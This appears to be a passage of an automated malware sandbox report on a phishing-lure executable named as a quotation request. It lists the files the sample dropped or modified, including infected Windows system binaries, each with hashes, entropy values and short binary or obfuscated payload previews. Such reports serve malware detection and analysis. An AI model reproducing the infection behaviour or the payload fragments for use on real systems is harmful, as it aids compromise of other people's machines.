Preview:	EA06..n...x.Z.F.T.L&3mv.6....Y.2cG..iuY..O.Qj`..`.x....j8..j ..P.x..U...q......U..=.O.3y.zY'.....{>.]'UX..I).W.6..j.l.J&.K-b{9..-f.u...jl..u........$..H.Vf.....'.y.2cg..>...b!E..@%...mU.....[]:.>.G....m..S..z\|....f4.(..(`.]..5[...U~.`...+6.O@<2.....\|Qj=>p.=..E...v.;..h`....J.."`....Q.U.......Q...t...........A..%3.....8.....z.Q..-31..................R... ..2mB..3szfg.Q.....u>.C..).O.....=...[>.....?.^.=...kU.........`.LTo...P....@....M@.....!.<' .DX.h........7.B.Y.....FmQ.....F.7.lh...>M...(....'..&3...6.....6..<.@.....~.L&\.8.Q\.B....._$..f.....G..).J..7...6.:.>aN..4^..U.F`S.m..W.E......G.M8.P'b./..nT...3v...:...r.S.U.=;G..rd.z..n..-R.T.T.v.U>a1.^..I..[0..h...J...&..H..y.U+.i.r.G.N(...^....q{.^a.....;.x.y.@.....d...S.\|.cK..#6.}.+S......mW..0.y...7.Gh.......Ll ... .Lf./M:mM.l,.zd.........z.x...W....{....X..cG..lq...O.G@.........UX.JcE...<..Z.-....j.676....=6.y.Zf...Zc\|..i.........H..u0..y..=Fka..&:....S...[...E.R....F;..u.J.Va1.Z" .L..1.V.

C:\Users\user\AppData\Local\Temp\autB1AB.tmp

Process:	C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe
File Type:	data
Category:	dropped
Size (bytes):	14682
Entropy (8bit):	7.631699543341731
Encrypted:	false
SSDEEP:	384:ITYznwyHtzwpHjuAlYRgqRjJODF7kpLDDul6fN2p3U:IAwyHtzwBKWpqRjYkJfuls
MD5:	96AAEF7AC0843F1F9CC3BA9BBB46DB93
SHA1:	98D47CE4BE012A3F31BC8FADAEDA5FA91410E3D8
SHA-256:	D505711C6CFE113DC7AA52599212A5EC8E3BFC54DD9863393E96D33AA7624C40
SHA-512:	54855A8765F39F25542C1B161FE758987018195D72960709E82F14A3E5175608FFB6449EC94B31254C4BD3E27F03BF4467C67A6E31A7F7C8FC108416EA5C93D6
Malicious:	false
Reputation:	unknown
Preview:	EA06..0..[.....+x..f....... .V......71...@.x..L........`......8............`.......Z\|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...\| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<\|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h\|!._....ga._.5.1.....`v/.......NA...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....\|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....\|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

C:\Users\user\AppData\Local\Temp\bothsidedness

Process:	C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe
File Type:	data
Category:	dropped
Size (bytes):	93696
Entropy (8bit):	6.855141524180877
Encrypted:	false
SSDEEP:	1536:qk2l6b8rnOGacyU1DZXIRAbxrEnkvUtuiu04D4kA9:qk2lKGacDpImbxr4kvAuiu0m4/9
MD5:	FB739F68BFB97FE057BBCB896ABC2D45
SHA1:	5B8846118EB3CAB76C70688028844B67787717D1
SHA-256:	D9134BA21002B1FB40B1AB67DD61CE11AA3E1173A5D8B7715BC0633C439EB7E5
SHA-512:	C1CEA4632D0D26396041BD89619B8897B13D07CB4947D92EC2FB2E76C867BE47DDF6EE7DD9ADF2955AEF379B91629FF69F395D100911534F68963A53AAE4BE5C
Malicious:	false
Reputation:	unknown
Preview:	...EPQHT\016..N6.O0U7L1G.1KU03TOPESQHTX016QGN6GO0U7L1GQ1KU03.OPE]N.ZX.8.p.Oz.nd=^?.7#^,'Q^t,1+=><t:U.D$)n_)ot.dl\(5TeX=9pOPESQHT.u16.FM6.uE.7L1GQ1KU.3VN[D.QH0Y01>QGN6GO>.6L1gQ1K.13TO.ESqHTX216UGN6GO0U3L1GQ1KU0.UOPGSQHTX036..N6WO0E7L1GA1KE03TOPECQHTX016QGN6..1U\|L1GQ.JU.6TOPESQHTX016QGN6GO0.6L=GQ1KU03TOPESQHTX016QGN6GO0U7L1GQ1KU03TOPESQHTX016QGN.GO8U7L1GQ1KU03\oPE.QHTX016QGN6i;U-CL1GESJU0.TOP!RQHVX016QGN6GO0U7L.GQQe'CA7OPE.THTX.06QAN6G)1U7L1GQ1KU03TO.ES.f&=\^UQGB6GO0.6L1EQ1K913TOPESQHTX016.GNtGO0U7L1GQ1KU03TO..RQHTX0y6QGL6BO(.7L..Q1HU03.OPC3.HT.016QGN6GO0U7L1GQ1KU03TOPESQHTX016QGN6GO0U7L.:.>...Z'.ESQHTX135UAF>GO0U7L1G/1KUv3TO.ESQ.TX0.6QG#6GO.U7LOGQ15U030OPE!QHT9016.GN6(O0UYL1G/1KU.1\|PPEY{nTZ..6QMN..<.U7F.FQ1O&.3TE.GSQL'{01<.DN6C<.U7F.CQ1O&.3TE.@SQL~.02.GAN6\ .U7F1D.$MU0(~iPG{hHTR0..QD.#AO0N.n1E.8KU4..<MESW`.X0;BXGN4.E0U3f/EyrKU:.v1CESUcTr.O"QGJ.Ge.+"L1Cz1awN%TOTnS{jO012zGd0m-0'.@17R^U05\|.PEYy.TX61.kG08GO4WX.1G[.a.0..OPCSy.TX61..GN0GgdU7J1o.1KS0.nOx.SQNTpa16WGd.G1.U7H.@/.KU4.B1aESU.R 0

C:\Users\user\AppData\Local\Temp\peaks

Process:	C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	143378
Entropy (8bit):	2.994192631471002
Encrypted:	false
SSDEEP:	96:AIXLr4g+F05BOo1d90FlDE/A6by8yBGcuZ9Izy2ul3mrWVjjrqnBaAJZdjureb3T:H3fjqDcIGcuZ9Izy2ul3mrWVjqnBaA
MD5:	38A8D46BEB538CBB9CB9C0915A8041A5
SHA1:	8E1EF81D77A8FF8D05E113FE84F341C8A48970E5
SHA-256:	F32A7AAC99BAFF5CD52D2635089E85002303B1C6823851CBE1F8A4ACFE1DA33E
SHA-512:	136FE7D8FAE12448FD8BC6F34EC3EADBD2ED9022C569413ACC419A6B03B4B962086E4AF2371A85000E903004190E04A2457F9B86953229F3107989356603AD0C
Malicious:	false
Reputation:	unknown
Preview:	dowp0dowpxdowp5dowp5dowp8dowpbdowpedowpcdowp8dowp1dowpedowpcdowpcdowpcdowp0dowp2dowp0dowp0dowp0dowp0dowp5dowp6dowp5dowp7dowpbdowp8dowp6dowpbdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowp4dowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowp6dowpbdowpadowp7dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowp8dowpbdowp8dowp6dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowpadowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowpcdowpbdowpadowp6dowpcdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowpedowpbdowp8dowp3dowp3dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp9dowp0dowpbdowp9dowp3dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp9dowp2dowpbdowpadowp2dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp9dowp4dowpbdowp8dowp6dowp4dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9

C:\Users\user\AppData\Roaming\713f49886881eab5.bin

Process:	C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe
File Type:	data
Category:	dropped
Size (bytes):	12320
Entropy (8bit):	7.984808590630635
Encrypted:	false
SSDEEP:	192:uEYV+F1OijK5E4L22aF2aC6AycieNOfXT4ZkVqNgXO5YHws7iqUpDtKHkIyVfhL2:uEY2N4LwC6Ayc5OpeRqws7ilzezy/zD+
MD5:	0423C796EE1FF04F0D7D644FD1DAE511
SHA1:	8D790D379AF65E17083E35229BA8DE267CDC96D0
SHA-256:	E84343356F0309722F5D29147B24D5627EA5A081E5E593BBEF54C549896DDC3D
SHA-512:	5A7D49EEEC91FFCB46A053EA7F9CCA3E5E415EDA3C497AFF09D378267FA81168E3808DE7E2A70EF15851CE4C36801219FE203AA795558573EDC3A65E695C83B7
Malicious:	false
Reputation:	unknown
Preview:	.D'...Jw.i\|O`.Q..8.E.R.S.+....G....".....~.D..^...Z.!i....N.1j.F..Y.}......)c...p.W4..^..}g%.2...2RA.....'O..Cpq.)H.J.T..K....P...D....88R...oM.>.f...hq\|...r...H.(..b(7..=..CIV(...D.......#...-._.<v...IA..:.....].:....i.\..5....!...Du....:#2.Z.?..qt...t.l...vQw..UFZ.#n@.D....q.)I#..#d@.7.D.....A...]....Q..}.x..2<..8e...srS.._....O.zy.....W..A.k.......5..Q-.:1.F.vE9.p..y:....7x.k'(..U.......&.....X4.m......&\.\|...[lK..=.......qM...3......z7.'.......fo.....]{....4q...f...R1...f..a..;JF/.y....^a:.W...\|....?.N.....f..1..P...XB.......e.j..9...o........#.c...cn.`........vI5.u.\|s....9^.".P....8...#i....!.....@......].3..2..gx....v.x'..?...;..Xb.0x.R!.0w-.8..@.6v.......z.....p#....a:a^....E:.H.&.0..ycF.M....k.eRj0..F.we....S).a..Ei....\.c.-....A.....\.:G....9........w"..t.d-...t..:...R.>...b~.,....."......@...&{2(..UW.}..9fs.]..I.L..6..Of.;.$.r.c..QO..$..C."..R......y...aO..W.-............H6.c.&.....Ll.b..;...s..M.pA..1..........P....

C:\Windows\DtcInstall.log

Process:	C:\Windows\System32\msdtc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	2313
Entropy (8bit):	5.133574766951497
Encrypted:	false
SSDEEP:	48:32qhuhCehuhqfhuhofhuhE2qhuh6987FMx7F/rt57wt+07FKC7867qrT7FoC786N:Z070s0Y0q0mF7Dm56
MD5:	9EAD220D2CD6CE9CFC6FBA7144F5AB75
SHA1:	0CEDF5D63AB2517D127723653E7215154B793E8A
SHA-256:	7AFABFFEF10AF2CED0B7C5374B6045EF34E0386EB6415957EC94083531034A0D
SHA-512:	8DFE89BE0AB5785D6D471C2BBABCB27026ECA4DBA5ADDF4F8A2FDD02A8EF24ED3F843F8FF26E665D038314293D58D3FBCE5AA24D3BABB84352BD8F735BE77E57
Malicious:	false
Reputation:	unknown
Preview:	12-07-2019 09:17 : DTC Install error = 0, Enter MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (367)..12-07-2019 09:17 : DTC Install error = 0, Action: None, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (396)..12-07-2019 09:17 : DTC Install error = 0, Entering CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1700)..12-07-2019 09:17 : DTC Install error = 0, Exiting CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1876)..12-07-2019 09:17 : DTC Install error = 0, Exit MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (454)..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcSpecialize : Enter, com\complus\dtc\dtc\adme\deployment.cpp (2099) ..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcGeneralize : Enter, com\complus\dtc\dtc\adme\deploy

C:\Windows\Logs\WindowsBackup\WBEngine.0.etl

Process:	C:\Windows\System32\wbengine.exe
File Type:	data
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.7994900643464797
Encrypted:	false
SSDEEP:	48:wzj/wwlTS7Pj/QP/PNPzP7zapDfYDq7PEpsGs/rt9:S/www7IMgQj9
MD5:	9972B85AAD6C7AEE98B5EB5BE4F27564
SHA1:	DD9F05A1F0AB697D9718034A4E13A02EAADEA0E4
SHA-256:	4C128EBAFA8C0A31D3FF0DBC3BFC10BF4FCCA40567B3A08802CD483A227CCAFC
SHA-512:	9905F0A0AFCD238D65B1D2D9071F35D435CECF39477A176A7F6F95DF4EA350BA50B6FA60670ABD69C881053C8719BF3935412E59770B4C6110BA710DFD622AD8
Malicious:	false
Reputation:	unknown
Preview:	.(..@...@...........................................!...........................h..........m.............(......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O............u...O..........W.B.E.n.g.i.n.e...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.W.i.n.d.o.w.s.B.a.c.k.u.p.\.W.B.E.n.g.i.n.e...0...e.t.l...........P.P.h..........m................................................................8.B....m....19041.1.amd64fre.vb_release.191206-1406.....,.@....m...............'"a.-....spp.pdb...........@....m.....T.c..i.\.C.s"8@....vssvc.pdb......./.@....m....W.p.D.......]....vssapi.pdb......-.@....m.....\..Q....T*&.......udfs.pdb........0.@....m......B..,`..9..4.....ifsutil.pdb.....-.@....m....I:...S%9.`...'.R....uudf.pdb........1.@....m...........1$OI"......wbengine.pdb................................

C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\713f49886881eab5.bin

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	12320
Entropy (8bit):	7.9881906884411285
Encrypted:	false
SSDEEP:	384:jlXcDvBQ6WOSKPjjc6tmcm9zP9UD7354x:ZXUBQ9Or06tbmMDz5w
MD5:	E731B2EDAA1DA307D7F05C94F0BCD55D
SHA1:	4A62D5169B97377C61A36B99457F94A7BE616975
SHA-256:	7AAD48B778BDBFFDEAB26C5EC2DDEA1BE67CDCF7BDD7F75555E0216FF816FF1D
SHA-512:	1B02F4F8F691E852BBFC30AE80B633014AE0FFCC8DF9183C8A6DDDAF6816EBFD17EB108A19308352D4929B305D59B9237F1066349CF8E8B727647F4451BD95D8
Malicious:	false
Reputation:	unknown
Preview:	......?sm..<......=M..r.l...Z.A..m...GOh..DC.. ..d\|..r....'d..v...l..e.R.f..g.K.5...v.t...b..`..b...(..y.".......Z.{77+..?_D...M.av..&I..x..\|..%.3.....c^g..5.=....v.;...98G..=o..s.V..KM.v....5.......1..x..y...5.....p....CY\|..@"I...}..WC.I....@..X.i&`..3i.0..%9+yi+......l.].x<...3.3.4$[.=j.N....D?.j ......e.5.aq........_E.D.P.d....LPb{...9O....J...z.B.L..kI+.l...<7+..;Q...........D....t.p......5<A.{t..6...b..Ij.)~..gW9V.H.L...,.ds!.&.&.O.7vPe!_s........v.s.......2.\|......J...7S..bs.2q.M..`i...[._....y.\|.....Ll..}....!.#YH..9.D..\&t.m.#.m.^iN.%..X->u..@1.....(.D.W.{...v.iv.....V.Y.yQB...e.Z[..%[..........r]..k.._......,..e..6..$c....g..O.Yl.M.#.....X...k...[...5.R@x...........ss(...."..\|..z...;.%.w$..A...E......a..~-..5...2..F99.7.\|.;.%...(..R.T.s=.7..$.......n..h.P..g.....,.D...-.3b`A...DFB..j.1...7.^.k6.]O?lR.j.u].....*...?{+iI.h.kc.>...^.Lt...t.+...t.....$.....pF].,}Q....L.;.<b.5.E.. .;.._>l..Z..Q....0...2.yA.F.f-...?.&k.....:.;..s

C:\Windows\SysWOW64\perfhost.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1257472
Entropy (8bit):	4.683348098155314
Encrypted:	false
SSDEEP:	12288:j9GJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:j9GJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	95B91FACFA2553E088397F5D45544CBA
SHA1:	978451241A3D0ABB0C492D4A4AD1E62A689E211A
SHA-256:	756594586EAC41726DA15FACE4A6F1CF4E1951DDEF22C027861CF81A819AE573
SHA-512:	29384EE3A6463E142EF5F0141D0ED0CC28275924CF8BE1E84E1BF95FCAAB500AFCF7B5D920E11AC30F59B0D1DB78BECBED72F8E3B2DEC76DB08873E67922CD7E
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+-.~E~.~E~.~E~...~.~E~..F..~E~..A..~E~.~D~.~E~..D..~E~..@..~E~..L..~E~...~.~E~..G..~E~Rich.~E~................PE..L...CY]..................&...,...............@....@..........................`......Z............ ..........................lQ..@....`..................................T............................................P..h............................text....%.......&.................. ..`.data........@.......*..............@....idata.......P.......,..............@..@.rsrc........`.......8..............@..@.reloc...............P..............@...........................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\AgentService.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1801216
Entropy (8bit):	6.967334718477165
Encrypted:	false
SSDEEP:	49152:7wVFr68Vw9wn/6h8p1zidVJLeQVPyzc+E7xQ2l:7wVFrssCndV1vcbE7xQ2l
MD5:	46464B0DFA3DB2510FE14D5EF738D11F
SHA1:	394793FC4D1D7F5AEEDF9392801034DDAC4F331E
SHA-256:	55F9CC272674232D1C2682122222C4D5113069517DB0B9F6A68ECD017768C206
SHA-512:	CDCF6FBDAB1C612FF2997F5645FE0C9FAEDA6999A3884798CD7BE746CD086EA731EB03FF4402D6C3502E8CA15DF4C4FC89722430A2340FDF886ACDFCCFBC2682
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...qq.Bqq.Bqq.Be..Crq.Be..Ciq.Be..C2q.Be..Cfq.Bqq.BIp.Be..C2q.Be.)Bpq.Be..Cpq.BRichqq.B........PE..d.................".................0..........@.....................................b.... .......... ......................................X........... ....0...}..................0...T...................(...(...................P................................text............................... ..`.rdata..............................@..@.data...........t..................@....pdata...}...0...~..................@..@.rsrc... ...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

C:\Windows\System32\AppVClient.exe

Process:	C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	modified
Size (bytes):	1348608
Entropy (8bit):	7.245308606450502
Encrypted:	false
SSDEEP:	24576:kQW4qoNUgslKNX0Ip0MgHCp+MBOuJGJ0eeQ2yPyzc+E7xonyVGc/dT5N:kQW9BKNX0IPgi8MBOukJLeQVPyzc+E71
MD5:	15CAEE52ED0777ABF3C8D97EE4818BB1
SHA1:	FA8FD9C4BFEFA75DD4FBA2C8F350CC2C7044D79E
SHA-256:	7CA0C602474353919865FF29FF3048F09C1702A12ADD111029B021E33B224D47
SHA-512:	2186A284860E0FFF54B5AB6EBDD6B15D8BEA4B84C51DBA797964146EAF374CEE157C157981BE7B09709925498F80D59BDDAADCD2C143913762F1A2C89DB8AC65
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@.......................................... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1330688
Entropy (8bit):	4.822841472865012
Encrypted:	false
SSDEEP:	24576:m2G7AbHjk8GJ0eeQ2yPyzc+E7xonyVGc/dT5N:m2G7AbHjCJLeQVPyzc+E7xQ2l
MD5:	F1CB0A0C4D6E9E6EAAD3B76B1716C079
SHA1:	A9273F2335873D0968EB0B1495AAA1FD25CEEF2F
SHA-256:	09D695641B2E2287F730C717EC0F7BFDCD45E61EC5EFDDC67874C5BA8ECE0AD0
SHA-512:	53172EB4999C78058420DDC0ACDDE03BB0C6098B1B2AE1B07976AFDA228D5256439E9354BEA376B2B3EEC1492928C3CB6D43D857B38E491B994C956E9286DECE
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@....................................<I.... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...............n..............@...........................................................................................................................................................................................................................................................

C:\Windows\System32\FXSSVC.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1242624
Entropy (8bit):	7.280859649553077
Encrypted:	false
SSDEEP:	24576:vkdpSI+K3S/GWei+qNv2wG3EGJ0eeQ2yPyzc+E7xonyVGc/dT5N:v6SIGGWei2wG3bJLeQVPyzc+E7xQ2l
MD5:	1B98ADE6B240EAC1ED51A8847FC157EB
SHA1:	28543D0E281A95DD16434263F8F5343836BC6784
SHA-256:	3FA4786B53C71DCEF84879AB6FD6011B71EAF04E950C7E195CCC2067E47372DC
SHA-512:	112AB9AAE7A730F624C84EE76830C3167285B40A9803C083448CC839AF8D916D558067119DB3DD0FD4FB6E1735E6A9EAB96D5FA0049234FB5CC511A888A1E331
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...\|..}x...y..}x..}y.x\|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P......(..... ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................

C:\Windows\System32\Locator.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1247744
Entropy (8bit):	4.662135810541899
Encrypted:	false
SSDEEP:	12288:ghGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:ghGJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	1A71445017EDEBF6811D579BE5438F3B
SHA1:	B27E96FB560D2FC1A9295FDC14DA1D4EFE6855B8
SHA-256:	A66F9C5C9B8D5BF1D949FFDA18694AC53F4F57D8E1F9074442895A2E4AB268C4
SHA-512:	8D3E84143C0BF4A2D78E21768F61C826A46F1730954AEBE96767DA022EF4312EDFBAB987F0EC1AFEF613663CE690A10988B3017B2F0558D889E5A12512425161
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C."^".q^".q^".qWZ;qL".qJI.p_".qJI.p\".qJI.pO".q^".qy".qJI.p[".qJI.p]".qJIWq_".qJI.p_".qRich^".q........................PE..d...k(............".........."...... ..........@.............................@.......#.... .......... .......................................&.......P.......@......................0#..T............................ ..............(!..p............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@....... ..............@..@.rsrc........P......."..............@..@.reloc.......`.......*..............@...........................................................................................................................................................................................................................................................

C:\Windows\System32\MsDtc\Trace\dtctrace.log

Process:	C:\Windows\System32\msdtc.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.32245258200109317
Encrypted:	false
SSDEEP:	12:nQcXl80kqF69Fq5zx46CzE5Z2+fqjFjQcXn:Qv1ziY+fCEE
MD5:	04BBB4AF834435C9541C0285B6011826
SHA1:	0A48D284FB21C14A3D19C1251A9D12AE94B41B20
SHA-256:	DF508AE6FF7E98C6D41FC8435325FEDDB369542FCA3B47AD3B89DB6FDB2E2DBF
SHA-512:	0C85ECC59C82A412DEDE5B15250A30A8B1CCB7A21093A7E93815D3D70C40B8DAFAEAE580D1E2B7267DB8FF13A50ED07F7E78EC62659EE79A504E92716695C3B7
Malicious:	false
Reputation:	unknown
Preview:	.@..X...X.......................................X...!...............................p...5}.f.............@......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O................O..........M.S.D.T.C._.T.R.A.C.E._.S.E.S.S.I.O.N...C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.S.D.t.c.\.t.r.a.c.e.\.d.t.c.t.r.a.c.e...l.o.g.............P.P.....p...5}.f............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\OpenSSH\ssh-agent.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1617920
Entropy (8bit):	4.941667824273141
Encrypted:	false
SSDEEP:	24576:fAL3UTsGJ0eeQ2yPyzc+E7xonyVGc/dT5N:fAL3UnJLeQVPyzc+E7xQ2l
MD5:	33B97B079F45CE82E6F4A328EBAB3909
SHA1:	B863F9190DF0E214D98B3FF77A68291AB65A6294
SHA-256:	49777D1C6BC66037560304DB0C1E3F99C1FA6AEB8D24D2C03A44C7F1ADD0C0EE
SHA-512:	CE43522701C88910BE3A4675652847D2B88776D7397BA578C31A25DE21FAD355ACDEEB218D1115FD12E6D1F752359EF849689DAC2E1C7A2D1EFC2E2822810697
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D\|.%...%...%...C...%...C...%...C..{%.....%...{...%...{...%...{...%...]...%../L...%...%..6$..&{...%..&{.%...%...%..&{...%..Rich.%..................PE..d.....q^.........."..........:.......i.........@..............................$........... ......................................................... ..x.......T...................P..p...........................`Q..................8............................text............................... ..`.rdata..............................@..@.data....I..........................@....pdata..T*.......,..................@..@.rsrc...x.... ......................@..@.reloc.......0......................@...........................................................................................................................................................................................................................

C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1342464
Entropy (8bit):	4.843534574559916
Encrypted:	false
SSDEEP:	12288:gpFtvOwGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:IOwGJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	5A764611EA22446F05BB79BB3366106F
SHA1:	720FA2CA41D675DBA90D3AAE227F8B6A97B39799
SHA-256:	F7386533EF0EE5337E55F4AD08E4D25829DC59C35BFFC96144E3668258A0BA14
SHA-512:	F12B478BA1AFCD99C2AA5CC8F0D90E58701BB368FF935C228D923141A6C7341780967F4E3807E2F187685D8016D27758C471ADBC6F9D0A0E22395E87D98308CA
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@A...A...A...H.......U...K...U...B...A.....U...F...U...N...U...e...U.t.@...U.v.@...U...@...RichA...................PE..d...6............".................0..........@.....................................c.... .......... ......................................Xq..........x............................S..T...................(..(....)..............P...............................text...@........................... ..`.rdata...n... ...p..................@..@.data...............................@....pdata..............................@..@.rsrc...x...........................@..@.reloc..............................@...........................................................................................................................................................................................................................................................

C:\Windows\System32\SearchIndexer.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1513984
Entropy (8bit):	7.094329110638084
Encrypted:	false
SSDEEP:	24576:g3frCoQ9tLsiLPLe24CxruW4bIhllsGJ0eeQ2yPyzc+E7xonyVGc/dT5N:g3fIsIPLkCNuVbIhDzJLeQVPyzc+E7xX
MD5:	FBCDE969FF49C7FE7B5D597525F34B1A
SHA1:	A0B72B57077A8A0B0ADCFD0AEFDF32ECC2B96F4D
SHA-256:	429071959EA272AF36AAF7FDA08CB290279CE754992356DBEEB5934C035F69EE
